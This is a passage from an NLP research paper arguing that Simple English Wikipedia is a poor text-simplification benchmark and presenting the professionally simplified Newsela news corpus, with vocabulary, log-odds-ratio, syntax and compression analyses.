Thurn and Taxis in the Thurn and Taxis forests, east of Regensburg. [SIMP] Death On October 1, 1988, Strauß collapsed while hunting with the Prince of Thurn and Taxis in the Thurn and Taxis forests, east of Regensburg. Deletion Only (21%) [NORM] This article is a list of the 50 U.S. states and the District of Columbia ordered by population density. [SIMP] This is a list of the 50 U.S. states, ordered by population density. Real Simpli- fication Paraphrase Only (17%) [NORM] In 2002, both Russia and China also had prison populations in excess of 1 million. [SIMP] In 2002, both Russia and China also had over 1 million people in prison. (50%) Deleltion + (12%) Paraphrase [NORM] All adult Muslims, with exceptions for the infirm, are required to offer Salat prayers five times daily. [SIMP] All adult Muslims should do Salat prayers five times a day. Table 1: Example sentence pairs (NORM-SIMP) aligned between English Wikipedia and Simple English Wikipedia. The breakdown in percentages is obtained through manual examination of 200 randomly sam- pled sentence pairs in the Parallel Wikipedia Simplification (PWKP) corpus. ple grade levels. This parallel corpus is higher qual- ity and its size is comparable to the PWKP dataset. It helps us to showcase the limitations of Wikipedia data in comparison and it provides potential reme- dies that may improve simplification research. We are not the only researchers to notice prob- lems with Simple Wikipedia. There are many hints in past publications that reflect the inadequacy of this resource, which we piece together in this pa- per to support our arguments. Several different simplification datasets have been proposed (Bach et al., 2011; Woodsend and Lapata, 2011a; Coster and Kauchak, 2011; Woodsend and Lapata, 2011b), but most of these are derived from Wikipedia and not thoroughly analyzed. Siddharthan (2014)’s ex- cellent survey of text simplification research states that one of the most important questions that needs to be addressed is “how good is the quality of Simple English Wikipedia”. To the best of our knowledge, we are the first to systematically quantify the qual- ity of Simple English Wikipedia and directly answer this question. We make our argument not as a criticism of others or ourselves, but as an effort to refocus research di- rections in the future (Eisenstein, 2013). We hope to inspire the creation of higher quality simplification datasets, and to encourage researchers to think crit- ically about existing resources and evaluation meth- ods. We believe this will lead to breakthroughs in text simplification research. 2 Simple Wikipedia is not that simple The Parallel Wikipedia Simplification (PWKP) cor- pus (Zhu et al., 2010) contains approximately 108,000 automatically aligned sentence pairs from cross-linked articles between Simple and Normal English Wikipedia. It has become a benchmark dataset for simplification largely because of its size and availability, and because follow-up papers (Woodsend and Lapata, 2011a; Coster and Kauchak, 2011; Wubben et al., 2012; Narayan and Gardent, 2014; Siddharthan and Angrosh, 2014; Angrosh et al., 2014) often compare with Zhu et al.’s system outputs to demonstrate further improvements. The large quantity of parallel text from Wikipedia made it possible to build simplification systems us- ing statistical machine translation (SMT) technol- ogy. But after the initial success of these first- generation systems, we started to suffer from the 284 inadequacy of the parallel Wikipedia simplification datasets. There is scattered evidence in the litera- ture. Bach et al. (2011) mentioned they have at- tempted to use parallel Wikipedia data, but opted to construct their own corpus of 854 sentences (25% from New York Times and 75% are from Wikipedia) with one manual simplification per sentence. Wood- send and Lapata (2011a) showed that rewriting rules learned from Simple Wikipedia revision his- tories produce better output compared to the “un- avoidably noisy” aligned sentences from Simple- Normal Wikipedia. The Woodsend and Lapata (2011b) model, that used quasi-synchronous gram- mars learned from Wikipedia revision history, left 22% sentences unchanged in the test set. Wubben et al. (2012) found that a phrase-based machine translation model trained on the PWKP dataset of- ten left the input unchanged, since “much of train- ing data consists of partially equal input and out- put strings”. Coster and Kauchak (2011) constructed another parallel Wikipedia dataset using a more so- phisticated sentence alignment algorithm with an additional step that first aligns paragraphs. They no- ticed that 27% aligned sentences are identical be- tween simple and normal, and retained them in the dataset “since not all sentences need to be simplified and it is important for any simplification algorithm to be able to handle this case”. However, we will show that many sentences that need to be simplified are not simplified in the Simple Wikipedia. We manually examined the Parallel Wikipedia Simplification (PWKP) corpus and found that it is noisy and half of its sentence pairs are not simplifi- cations (Table 1). We randomly sampled 200 one-to- one sentence pairs from the PWKP dataset (one-to- many sentence splitting cases consist of only 6.1% of the dataset), and classify each sentence pair into one of the three categories: Not Aligned (17%) - Two sentences have different meanings, or only have partial content overlap. Not Simpler (33%)- The SIMP sentence has the same meaning as the NORM sentence, but is not simpler. Real Simplification (50%)- The SIMP sentence has the same meaning as the NORM sentence, and is simpler. We fur- ther breakdown into whether the simplification is due to deletion or paraphrasing. Table 1 shows a detailed breakdown and repre- sentative examples for each category. Although Zhu et al. (2010) and Coster and Kauchak (2011) have provided a simple analysis on the accuracy of sen- tence alignment, there are some important facts that cannot be revealed without in-depth manual inspec- tion. The “non-simplification” noise in the parallel Simple-Normal Wikipedia data is a much more se- rious problem than we all thought. The quality of “real simplifications” also varies: some sentences are simpler by only one word while the rest of sen- tence is still complex. The main causes of non-simplifications and partial-simplifications in the parallel Wikipedia cor- pus include: 1) The Simple Wikipedia was created by volunteer contributors with no specific objective; 2) Very rarely are the simple articles complete re-writes of the regular articles in Wikipedia (Coster and Kauchak, 2011), which makes automatic sentence alignment errors worse; 3) As an encyclo- pedia, Wikipedia contains many difficult sentences with complex terminology. The difficulty of sen- tence alignment between Normal-Simple Wikipedia is highlighted by a recent study by Hwang et al. (2015) that achieves state-of-the-art performance of 0.712 maximum F1 score (over the precision- recall curve) by combining Wiktionary-based and dependency-parse-based sentence similarities. And in fact, even the simple side of the PWKP corpus contains an extensive English vocabulary of 78,009 unique words. 6,669 of these words do not exist in the normal side (Table 2). Below is a sentence from an article entitled “Photolithography" in Simple Wikipedia: Microphototolithography is the use of pho- tolithography to transfer geometric shapes on a photomask to the surface of a semiconductor wafer for making integrated circuits. We should use the PWKP corpus with caution and consider other alternative parallel simplification cor- pora. Alternatives could come from Wikipedia (but better aligned and selected) or from manual simpli- fication of other domains, such as newswire. In the 285 PWKP Normal Simple #words (avg. freq) 95,111 (23.91) 78,009 (23.88) Normal 0 6,669(1.31) Simple 23,771 (1.42) 0 Table 2: The vocabulary size of the Parallel Wikipedia Simplification (PWKP) corpus and the vocabulary difference between its normal and sim- ple sides (as a 2×2 matrix). Only words consisting of the 26 English letters are counted. next section, we will present a corpus of news ar- ticles simplified by professional editors, called the Newsela corpus. We perform a comparative corpus analysis of the Newsela corpus versus the PWKP corpus to further illustrate concerns about PWKP’s quality. 3 What the Newsela corpus teaches us To study how professional editors conduct text sim- plification, we have assembled a new simplification dataset that consists of 1,130 news articles. Each ar- ticle has been re-written 4 times for children at dif- ferent grade levels by editors at Newsela2, a com- pany that produces reading materials for pre-college classroom use. We use Simp-4 to denote the most simplified level and Simp-1 to denote the least sim- plified level. This data forms a parallel corpus, where we can align sentences at different reading levels, as shown in Table 3. Unlike Simple Wikipedia, which was created without a well-defined objective, Newsela is meant to help teachers prepare curricula that match the En- glish language skills required at each grade level. It is motivated by the Common Core Standards (Porter et al., 2011) in the United States. All the Newsela ar- ticles are grounded in the Lexile3 readability score, which is widely used to measure text complexity and assess students’ reading ability. 3.1 Manual examination of Newsela corpus We conducted a manual examination of the Newsela data similar to the one for Wikipedia data in Table 1. The breakdown of aligned sentence pairs between different versions in Newsela is shown in Figure 1. 2https://newsela.com/ 3http://en.wikipedia.org/wiki/Lexile Figure 1: Manual classification of aligned sentence pairs from the Newsela corpus. We categorize ran- domly sampled 50 sentence pairs drawn from the Original-Simp2 and 50 sentences from the Original- Simp4. It is based on 50 randomly selected sentence pairs and shows much more reliable simplification than the Wikipedia data. We designed a sentence alignment algorithm for the Newsela corpus based on Jaccard similarity (Jac- card, 1912). We first align each sentence in the sim- pler version (e.g. s1 in Simp-3) to the sentence in the immediate more complex version (e.g. s2 in Simp- 2) of the highest similarity score. We compute the similarity based on overlapping word lemmas:4 Sim(s1,s2) = |Lemmas(s1)∩Lemmas(s2)| |Lemmas(s1)∪Lemmas(s2)| (1) We then align sentences into groups across all 5 ver- sions for each article. For cases where no sentence splitting is involved, we discard any sentence pairs with a similarity smaller than 0.40. If splitting oc- curs, we set the similarity threshold to 0.20 instead. Newsela’s professional editors produce sim- plifications with noticeably higher quality than Wikipedia’s simplifications. Compared to sentence alignment for Normal-Simple Wikipedia, automati- cally aligning Newsela is more straightforward and reliable. The better correspondence between the simplified and complex articles and the availability of multiple simplified versions in the Newsela data also contribute to the accuracy of sentence align- ment. 4We use the WordNet lemmatization in the NLTK package: http://www.nltk.org/ 286 https://newsela.com/ http://en.wikipedia.org/wiki/Lexile http://www.nltk.org/ Grade Level Lexile Score Text 12 1400L Slightly more fourth-graders nationwide are reading proficiently compared with a decade ago, but only a third of them are now reading well, according to a new report. 7 1070L Fourth-graders in most states are better readers than they were a decade ago. But only a third of them actually are able to read well, according to a new report. 6 930L Fourth-graders in most states are better readers than they were a decade ago. But only a third of them actually are able to read well, according to a new report. 4 720L Most fourth-graders are better readers than they were 10 years ago. But few of them can actually read well. 3 510L Fourth-graders are better readers than 10 years ago. But few of them read well. Table 3: Example of sentences written at multiple levels of text complexity from the Newsela data set. The Lexile readability score and grade level apply to the whole article rather than individual sentences, so the same sentences may receive different scores, e.g. the above sentences for the 6th and 7th grades. The bold font highlights the parts of sentence that are different from the adjacent version(s). Newsela PWKP Original Simp-1 Simp-2 Simp-3 Simp-4 Normal Simple Total #sents 56,037 57,940 63,419 64,035 64,162 108,016 114,924 Total #tokens 1,301,767 1,126,148 1,052,915 903,417 764,103 2,645,771 2,175,240 Avg #sents per doc 49.59 51.27 56.12 56.67 56.78 — — Avg #words per doc 1,152.01 996.59 931.78 799.48 676.2 — — Avg #words per sent 23.23 19.44 16.6 14.11 11.91 *24.49 *18.93 Avg #chars per word 4.32 4.28 4.21 4.11 4.02 5.06 4.89 Table 4: Basic statistics of the Newsela Simplification corpus vs. the Parallel Wikipedia Simplification (PWKP) corpus. The Newsela corpus consists of 1130 articles with original and 4 simplified versions each. Simp-1 is of the least simplified level, while Simp-4 is the most simplified. The numbers marked by * are slightly different from previously reported, because of the use of different tokenizers. Newsela Original Simp-1 Simp-2 Simp-3 Simp-4 #words (avg. freq) **39,046 (28.31) 33,272 (28.64) 29,569 (30.09) 24,468 (31.17) 20,432 (31.45) Original 0 724 (1.19) 815 (1.25) 720 (1.32) *583 (1.33) Simp-1 6,498 (1.38) 0 618 (1.08) 604 (1.15) 521 (1.21) Simp-2 10,292 (1.67) 4,321 (1.32) 0 536 (1.13) 475 (1.16) Simp-3 15,298 (2.14) 9,408 (1.79) 5,637 (1.46) 0 533 (1.14) Simp-4 **19,197 (2.60) 13,361 (2.24) 9,612 (1.87) 4,569 (1.40) 0 Table 5: This table shows the vocabulary changes between different levels of simplification in the Newsela corpus (as a 5×5 matrix). Each cell shows the number of unique word types that appear in the corpus listed in the column but do not appear in the corpus listed in the row. We also list the average frequency of those vocabulary items. For example, in the cell marked *, the Simp-4 version contains 583 unique words that do not appear in the Original version. By comparing the cells marked **, we see about half of the words (19,197 out of 39,046) in the Original version are not in the Simp-4 version. Most of the vocabulary that is removed consists of low-frequency words (with an average frequency of 2.6 in the Original). 287 3.2 Vocabulary statistics Table 4 shows the basic statistics of the Newsela cor- pus and the PWKP corpus. They are clearly differ- ent. Compared to the Newsela data, the Wikipedia corpus contains remarkably longer (more complex) words and the difference of sentence length before and after simplification is much smaller. We use the Penn Treebank tokenizer in the Moses package.5 Tables 2 and 5 show the vocabulary statistics and the vocabulary difference matrix of the PWKP and Newsela corpus. While the vocabulary size of the PWKP corpus drops only 18% from 95,111 unique words to 78,009, the vocabulary size of the Newsela corpus is reduced dramatically by 50.8% from 39,046 to 19,197 words at its most simplified level (Simp-4). Moreover, in the Newsela data, only several hundred words that occur in the simpler ver- sion do not occur in the more complex version. The words introduced are often abbreviations (“National Hurricane Center” → “NHC”), less formal words (“unscrupulous” → “crooked”) and shortened words (“chimpanzee” → “chimp”). This implies a more complete and precise degree of simplification in the Newsela than the PWKP dataset. 3.3 Log-odds-ratio analysis of words In this section, we visualize the differences in the topics and degree of simplification between the Sim- ple Wikipedia and the Newsela corpus. To do this, we employ the log-odds-ratio informative Dirichlet prior method of Monroe et al. (2008) to find words and punctuation marks that are statistically overrep- resented in the simplified text compared to the orig- inal text. The method measures each token by the z-score of its log-odds-ratio as: δ (i−j) t√ σ2(δ (i−j) t ) (2) It uses a background corpus when calculating the log-odds-ratio δt for token t, and controls for its vari- ance σ2. Therefore it is capable of detecting dif- ferences even in very frequent tokens. Other meth- ods used to discover word associations, such as mu- 5https://github.com/moses-smt/ mosesdecoder/blob/master/scripts/ tokenizer/tokenizer.perl tual information, log likelihood ratio, t-test and chi- square, often have problems with frequent words (Jurafsky et al., 2014). We choose the Monroe et al. (2008) method because many function words and punctuations are very frequent and play important roles in text simplification. The log-odds-ratio δ(i−j)t for token t estimates the difference of the frequency of token t between two text sets i and j as: δ (i−j) t = log( yit + αt ni + α0 − (yit + αt) ) − log( y j t + αt nj + α0 − (yjt + αt) ) (3) where ni is the size of corpus i, nj is the size of corpus j, yit is the count of token t in corpus i, y j t is the count of token t in corpus j, α0 is the size of the background corpus, and αt is the count of token t in the background corpus. We use the combination of both simple and complex sides in the corpus as the background. And the variance of the log-odds-ratio is esti- mated by: σ2(δ (i−j) t ) ≈ 1 yit + αt + 1 y j t + αt (4) Table 6 lists the top 50 words and punctuation marks that are the most strongly associated with the complex text. Both corpora significantly reduce function words and punctuation. The content words show the differences of the topics and subject mat- ters between the two corpora. Table 7 lists the top 50 words that are the most strongly associated with the simplified text. The two corpora are more agree- able on what the simple words are than what com- plex words need to be simplified. Table 8 shows the frequency and odds ratio of ex- ample words from the top 50 complex words. The odds ratio of token t between two texts sets i and j is defined as: r (i−j) t = yit/y j t ni/nj (5) It reflects the difference of topics and degree of simplification between the Wikipedia and the Newsela data. The high proportion of clause-related function words, such as “which” and “where”, 288 https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl Linguistic class Newsela - Original Wikipedia (PWKP) - Normal Punctuation , "– ; ’ ( ) , ; – Determiner/Pronoun which we an such who i that a whose which whom Contraction ’s Conjunction and while although and although while Prepositions of as including with according by among in despite as with following to of within upon including Adverb currently approximately initially primarily subsequently typically thus formerly Noun percent director data research decades industry policy development state decade status university residents film commune footballer pays-de-la-loire walloon links midfielder defender goalkeeper Adjective federal potential recent executive economic northern northwestern southwestern external due numerous undated various prominent Verb advocates based access referred derived established situated considered consists regarded having Table 6: Top 50 tokens associated with the complex text, computed using the Monroe et al. (2008) method. Bold words are shared by the complex version of Newsela and the complex version of Wikipedia. Linguistic class Newsela - Simp4 Wikipedia (PWKP) - Simple Punctuation . . Determiner/Pronoun they it he she them lot it he they lot this she Conjunction because Adverb also not there too about very now then how about very there Noun people money scientists government things countries rules problems group movie people northwest north region loire player websites southwest movies football things Adjective many important big new used big biggest famous different important many Verb is are can will make get were wants was called help hurt be made like stop want works do live found is made called started pays said was got are like get can means says has went comes make put used Table 7: Top 50 tokens associated with the simplified text. Newsela PWKP Original Simp-4 odds-ratio Normal Simple odds-ratio which 2259 249 0.188 7261 4608 0.774 where 1472 546 0.632 1972 1470 0.909 advocates 136 0 0 6 3 0.610 approximately 21 0 0 480 140 0.356 thus 35 9 0.438 385 138 0.437 Table 8: Frequency of example words from Table 6. These complex words are reduced at a much greater rate in the simplified Newsela than they are in the Simple English Wikipedia. A smaller odds ratio indicates greater reduction. 289 Newsela - Original Wikipedia (PWKP) - Normal Newsela - Simp4 Wikipedia (PWKP) - Simple PP(of) → IN NP PP(as) → IN NP 1 S(is) → NP VP . NP(it) → PRP WHNP(which) → WDT PP(of) → IN NP 2 NP(they) → PRP S(is) → NP VP . SBAR(which) → WHNP S VP(born) → VBN NP NP PP 3 S(are) → NP VP . S(was) → NP VP . PP(to) → TO NP WHNP(which) → WDT 4 S(was) → NP VP . NP(he) → PRP NP(percent) → CD NN PP(to) → TO NP 5 NP(people) → NNS NP(they) → PRP WHNP(that) → WDT NP(municipality) → DT JJ NN 6 VP(is) → VBZ NP NP(player) → DT JJ JJ NN NN SBAR(that) → WHNP S FRAG(-) → ADJP : 7 NP(he) → PRP S(are) → NP VP . PP(with) → IN NP FRAG(-) → FRAG : FRAG 8 S(were) → NP VP . NP(movie) → DT NN PP(according) → VBG PP NP()) → NNP NNP NNP 9 NP(it) → PRP S(has) → NP VP . NP(percent) → NP PP NP(film) → DT NN 10 S(can) → NP VP . VP(called) → VBN NP NP(we) → PRP NP(footballer) → DT JJ JJ NN 11 S(will) → NP VP . VP(is) → VBZ PP PP(including) → VBG NP NP(footballer) → NP SBAR 12 ADVP(also) → RB VP(made) → VBN PP SBAR(who) → WHNP S ADVP(currently) → RB 13 S(have) → NP VP . VP(said) → VBD SBAR SBAR(as) → IN S VP(born) → VBN NP NP 14 S(could) → NP VP . VP(has) → VBZ NP WHNP(who) → WP ADVP(initially) → RB 15 S(said) → NP VP . VP(is) → VBZ NP NP(i) → FW PP(with) → IN NP 16 S(has) → NP VP . NP(this) → DT PP(as) → IN NP WHPP(of) → IN WHNP 17 NP(people) → JJ NNS VP(was) → VBD NP NP(director) → NP PP SBAR(although) → IN S 18 NP(money) → NN NP(people) → NNS PP(by) → IN NP ADVP(primarily) → RB 19 NP(government) → DT NN NP(lot) → DT NN S(has) → VP S(links) → NP VP . 20 S(do) → NP VP . NP(season) → NN CD PP(in) → IN NP VP(links) → VBZ NP 21 NP(scientists) → NNS S(can) → NP VP . SBAR(while) → IN S PP(following) → VBG NP 22 VP(called) → VBN NP VP(is) → VBZ VP PP(as) → JJ IN NP ADVP(subsequently) → RB 23 S(had) → NP VP . SBAR(because) → IN S PRN(–) → : NP : SBAR(which) → WHNP S 24 S(says) → NP VP . VP(are) → VBP NP S(’s) → NP VP SBAR(while) → IN S 25 S(would) → NP VP . NP(player) → DT JJ NN NN S(said) → ” S , ” NP VP . S(plays) → ADVP VP 26 S(say) → NP VP . NP(there) → EX PP(at) → IN NP PP(within) → IN NP 27 S(works) → NP VP . NP(lot) → NP PP PP(among) → IN NP PP(by) → IN NP 28 S(may) → NP VP . NP(websites) → JJ NNS SBAR(although) → IN S SBAR(of) → WHNP S 29 S(did) → NP VP . PP(like) → IN NP VP(said) → VBD NP S(is) → S : S . 30 S(think) → NP VP . S(started) → NP VP . Table 9: Top 30 syntax patterns associated with the complex text (left) and simplified text (right). Bold patterns are the top patterns shared by Newsela and Wikipedia. that are retained in Simple Wikipedia indicates the incompleteness of simplification in the Sim- ple Wikipedia. The dramatic frequency decrease of words like “which” and “advocates” in Newsela shows the consistent quality from professional sim- plifications. Wikipedia has good coverage on certain words, such as “approximately”, because of its large volume. 3.4 Log-odds-ratio analysis of syntax patterns We can also reveal the syntax patterns that are most strongly associated with simple text versus com- plex text using the log-odds-ratio technique. Ta- ble 9 shows syntax patterns that represent “parent node (head word) → children node(s)" structures from a constituency parse tree. To extract theses patterns we parsed our corpus with the Stanford Parser (Klein and Manning, 2002) and applied its built-in head word identifier from Collins (2003). Both the Newsela and Wikipedia corpora exhibit syntactic differences that are intuitive and interest- ing. However, as with word frequency (Table 8), complex syntactic patterns are retained more often in Wikipedia’s simplifications than in Newsela’s. In order to show interesting syntax patterns in the Wikipedia parallel data for Table 9, we first had to discard 3613 sentences in PWKP that contain both "is a commune" and "France". As the word-level analysis in Tables 6 and 7 hints, there is an exceeding number of sentences about communes in France in the PWKP corpus, such as the sentence pair below: [NORM] La Couture is a commune in the Pas-de-Calais department in the Nord-Pas-de-Calais region of France . [SIMP] La Couture, Pas-de-Calais is a commune. It is found in the region Nord-Pas-de-Calais in the Pas-de-Calais department in the north of France. This is a template sentence from a stub geo- graphic article and its deterministic simplification. The influence of this template sentence is more over- 290 whelming in the syntax-level analysis than in the word-level analysis —- about 1/3 of the top 30 syn- tax patterns would be related to these sentence pairs if they were not discarded. 3.5 Document-level compression There are few publicly accessible document-level parallel simplification corpora (Barzilay and Lap- ata, 2008). The Newsela corpus will enable more research on document-level simplification, such as anaphora choice (Siddharthan and Copestake, 2002), content selection (Woodsend and Lapata, 2011b), and discourse relation preservation (Sid- dharthan, 2003). Simple Wikipedia is rarely used to study document-level simplification. Woodsend and La- pata (2011b) developed a model that simplifies Wikipedia articles while selecting their most impor- tant content. However, they could only use Simple Wikipedia in very limited ways. They noted that Simple Wikipedia is “less mature” with many arti- cles that are just “stubs, comprising a single para- graph of just one or two sentences”. We quantify their observation in Figure 2, plotting the document- level compression ratio of Simple vs. Normal Wikipedia articles. The compression ratio is the ratio of the number of characters between each simple-complex article pair. In the plot, we use all 60 thousand article pairs from the Simple-Normal Wikipedia collected by Kauchak (2013) in May 2011. The overall compression ratio is skewed to- wards almost 0. For comparison, we also plot the ratio between the simplest version (Simp-4) and the original version (Original) of the news articles in the Newsela corpus. The Newsela corpus has a much more reasonable compression ratio and is therefore likely to be more suitable for studying document- level simplification. 3.6 Analysis of discourse connectives Although discourse is known to affect readability, the relation between discourse and text simplifica- tion is still under-studied with the use of statistical methods (Williams et al., 2003; Siddharthan, 2006; Siddharthan and Katsos, 2010). Text simplification often involves splitting one sentence into multiple sentences, which is likely to require discourse-level changes such as introducing explicit rhetorical rela- tions. However, previous research that uses Simple- Normal Wikipedia largely focuses on sentence-level transformation, without taking large discourse struc- ture into account. Figure 3: A radar chart that visualizes the odds ra- tio (radius axis) of discourse connectives in sim- ple side vs. complex side. An odds ratio larger than 1 indicates the word is more likely to occur in the simplified text than in the complex text, and vice versa. Simple cue words (in the shaded re- gion), except “hence”, are more likely to be added during Newsela’s simplification process than in Wikipedia’s. Complex conjunction connectives (in the unshaded region) are more likely to be retained in Wikipedia’s simplifications than in Newsela’s. To preserve the rhetorical structure, Siddharthan (2003, 2006) proposed to introduce cue words when simplifying various conjoined clauses. We perform an analysis on discourse connectives that are rel- evant to readability as suggested by Siddharthan (2003). Figure 3 presents the odds ratios of sim- ple cue words and complex conjunction connectives. The odds radios are computed for Newsela between the Original and Simp-4 versions, and for Wikipedia between Normal and Simple documents collected by Kauchak (2013). It suggests that Newsela ex- hibits a more complete degree of simplification than Wikipedia, and that it may be able to enable more computational studies of the role of discourse in text simplification in the future. 291 0.0 0.2 0.4 0.6 0.8 1.0 1.2 1.4 0 .0 0 .5 1 .0 1 .5 Newsela Compression Ratio D e n si ty 0 1 2 3 4 5 Wikipedia Compression Ratio D e n si ty 0.0 0.2 0.4 0.6 0.8 1.0 1.2 1.4 Figure 2: Distribution of document-level compression ratio, displayed as a histogram smoothed by kernel density estimation. The Newsela corpus is more normally distributed, suggesting more consistent quality. 3.7 Newsela’s quality is better than Wikipedia Overall, we have shown that the professional sim- plification of Newsela is more rigorous and more consistent than Simple English Wikipedia. The lan- guage and content also differ between the encyclo- pedia and news domains. They are not exchangeable in developing nor in evaluating simplification sys- tems. In the next section, we will review the evalua- tion methodology used in recent research, discuss its shortcomings and propose alternative evaluations. 4 Evaluation of simplification systems With the popularity of parallel Wikipedia data in simplification research, most state-of-the-art systems evaluate on simplifying sentences from Wikipedia. All simplification systems published in the ACL, NAACL, EACL, COLING and EMNLP main conferences since Zhu’s 2010 work compared solely on the same test set that consists of only 100 sentences from Wikipedia, except one paper that additionally experimented with 5 short news summaries. The most widely practiced evaluation methodology is to have human judges rate on gram- maticality (or fluency), simplicity, and adequacy (or meaning preservation) on a 5-point Likert scale. Such evaluation is insufficient to measure 1) the practical value of a system to a specific target reader population and 2) the performance of individual simplification components: sentence splitting, dele- tion and paraphrasing. Although the inadequacy of text simplification evaluations has been discussed before (Siddharthan, 2014), we focus on these two common deficiencies and suggest two future direc- tions. 4.1 Targeting specific audiences Simplification has many subtleties, since what con- stitutes simplification for one type of user may not be appropriate for another. Many researchers have studied simplification in the context of different au- diences. However, most recent automatic simplifica- tion systems are developed and evaluated with little consideration of target reader population. There is one attempt by Angrosh et al. (2014) who evaluate their system by asking non-native speakers compre- hension questions. They conducted an English vo- cabulary size test to categorize the users into differ- ent levels of language skills. The Newsela corpus allows us to target children at different grade levels. From the application point of view, making knowledge accessible to all children is an important yet challenging part of education (Scar- ton et al., 2010; Moraes et al., 2014). From the tech- nical point of view, reading grade level is a clearly defined objective for both simplification systems and human annotators. Once there is a well-defined ob- jective, with constraints such as vocabulary size and sentence length, it is easier to fairly compare differ- ent systems. Newsela provides human simplification 292 at different grade levels and reading comprehension quizzes alongside each article. In addition, readability is widely studied and can be automatically estimated (Kincaid et al., 1975; Pitler and Nenkova, 2008; Petersen and Ostendorf, 2009). Although existing readability metrics assume text is well-formed, they can potentially be used in combination with text quality metrics (Post, 2011; Louis and Nenkova, 2013) to evaluate simplifica- tions. They can also be used to aid humans in the creation of reference simplifications. 4.2 Evaluating sub-tasks separately It is widely accepted that sentence simplification in- volves three different elements: splitting, deletion and paraphrasing (Feng, 2008; Narayan and Gar- dent, 2014). Splitting breaks a long sentence into a few short sentences to achieve better readability. Deletion reduces the complexity by removing unim- portant parts of a sentence. Paraphrasing rewrites text into a simpler version via reordering, substitu- tion and occasionally expansion. Most state-of-the-art systems consist of all or a subset of these three components. However, the pop- ular human evaluation criteria (grammaticality, sim- plicity and adequacy) do not explain which compo- nents in a system are good or bad. More importantly, deletion may be unfairly penalized since shorter out- put tends to result in lower adequacy judgements (Napoles et al., 2011). We therefore advocate for a more informative evaluation that separates out each sub-task. We be- lieve this will lead to more easily quantifiable met- rics and possibly the development of automatic met- rics. For example, early work shows potential use of precision and recall to evaluate splitting (Sid- dharthan, 2006; Gasperin et al., 2009) and deletion (Riezler et al., 2003; Filippova and Strube, 2008). Several studies also have investigated various met- rics for evaluating sentence paraphrasing (Callison- Burch et al., 2008; Chen and Dolan, 2011; Ganitke- vitch et al., 2011; Xu et al., 2012, 2013; Weese et al., 2014). 5 Summary and recommendations In this paper, we presented the first systematic anal- ysis of the quality of Simple Wikipedia as a simpli- fication data resource. We conducted a qualitative manual examination and several statistical analyses (including vocabulary change matrices, compres- sion ratio histograms, log-odds-ratio calculations, etc.). We introduced a new, high-quality corpus of professionally simplified news articles, Newsela, as an alternative resource, that allowed us to demon- strate Simple Wikipedia’s inadequacies in compar- ison. We further discussed problems with current simplification evaluation methodology and proposed potential improvements. Our goal for this opinion paper is to stimulate progress in text simplification research. Simple En- glish Wikipedia played a vital role in inspiring sim- plification approaches based on statistical machine translation. However, it has so many drawbacks that we recommend the community to drop it as the standard benchmark set for simplification. Other re- sources like the Newsela corpus are superior, since they provide a more consistent level of quality, tar- get a particular audience, and approach the size of parallel Simple-Normal English Wikipedia. We be- lieve that simplification is an important area of re- search that has the potential for broader impact be- yond NLP research. But we must first adopt appro- priate data sets and research methodologies. Researchers can request the Newsela data fol- lowing the instructions at: https://newsela. com/data/ Acknowledgments The authors would like to thank Dan Cogan-Drew, Jennifer Coogan, and Kieran Sobel from Newsela for creating their data and generously sharing it with us. We also thank action editor Rada Mihalcea and three anonymous reviewers for their thoughtful comments, and Ani Nenkova, Alan Ritter and Max- ine Eskenazi for valuable discussions. This material is based on research sponsored by the NSF under grant IIS-1430651. The views and conclusions contained in this publication are those of the authors and should not be interpreted as repre- senting official policies or endorsements of the NSF or the U.S. Government. 293 https://newsela.com/data/ https://newsela.com/data/ References Allen, D. (2009). A study of the role of relative clauses in the simplification of news texts for learners of English. System, 37(4):585–599. Angrosh, M., Nomoto, T., and Siddharthan, A. (2014). Lexico-syntactic text simplification and compression with typed dependencies. In Pro- ceedings of the 14th Conference of the Euro- pean Chapter of the Association for Computa- tional Linguistics (EACL). Bach, N., Gao, Q., Vogel, S., and Waibel, A. (2011). Tris: A statistical sentence simplifier with log- linear models and margin-based discriminative training. In Proceedings of 5th International Joint Conference on Natural Language Process- ing (IJCNLP). Barzilay, R. and Lapata, M. (2008). Modeling local coherence: An entity-based approach. Computa- tional Linguistics, 34(1):1–34. Callison-Burch, C., Cohn, T., and Lapata, M. (2008). ParaMetric: An automatic evaluation metric for paraphrasing. In Proceedings of the 22nd International Conference on Computational Linguistics (COLING). Canning, Y., Tait, J., Archibald, J., and Crawley, R. (2000). Cohesive generation of syntactically simplified newspaper text. In Proceedings of the Third International Workshop on Text, Speech and Dialogue (TSD). Carroll, J., Minnen, G., Pearce, D., Canning, Y., De- vlin, S., and Tait, J. (1999). Simplifying text for language-impaired readers. In Proceedings of the 14th Conference of the 9th European Conference for Computational Linguistics (EACL). Chandrasekar, R., Doran, C., and Srinivas, B. (1996). Motivations and methods for text simpli- fication. In Proceedings of the 16th Conference on Computational linguistics (COLING). Chen, D. L. and Dolan, W. B. (2011). Collecting highly parallel data for paraphrase evaluation. In Proceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics (ACL). Chen, H.-B., Huang, H.-H., Chen, H.-H., and Tan, C.-T. (2012). A simplification-translation- restoration framework for cross-domain smt ap- plications. In Proceedings of the 24th Interna- tional Conference on Computational Linguistics (COLING). Collins, M. (2003). Head-driven statistical models for natural language parsing. Computational lin- guistics, 29(4):589–637. Coster, W. and Kauchak, D. (2011). Simple English Wikipedia: A new text simplification task. In Pro- ceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics: Human Language Technologies (ACL-HLT). De Belder, J. and Moens, M.-F. (2010). Text simpli- fication for children. In Prroceedings of the SIGIR Workshop on Accessible Search Systems. Eisenstein, J. (2013). What to do about bad language on the Internet. In Proceedings of the 2013 Con- ference of the North American Chapter of the As- sociation for Computational Linguistics: Human Language Technologies (NAACL-HLT). Elhadad, N. and Sutaria, K. (2007). Mining a lex- icon of technical terms and lay equivalents. In Proceedings of the Workshop on BioNLP 2007: Biological, Translational, and Clinical Language Processing. Feng, L. (2008). Text simplification: A survey. Technical report, The City University of New York. Filippova, K. and Strube, M. (2008). Dependency tree based sentence compression. In Proceedings of the 5th International Natural Language Gener- ation Conference (INLG). Ganitkevitch, J., Callison-Burch, C., Napoles, C., and Van Durme, B. (2011). Learning senten- tial paraphrases from bilingual parallel corpora for text-to-text generation. In Proceedings of the 2011 Conference on Empirical Methods in Natu- ral Language Processing (EMNLP). Gasperin, C., Maziero, E., Specia, L., Pardo, T., and 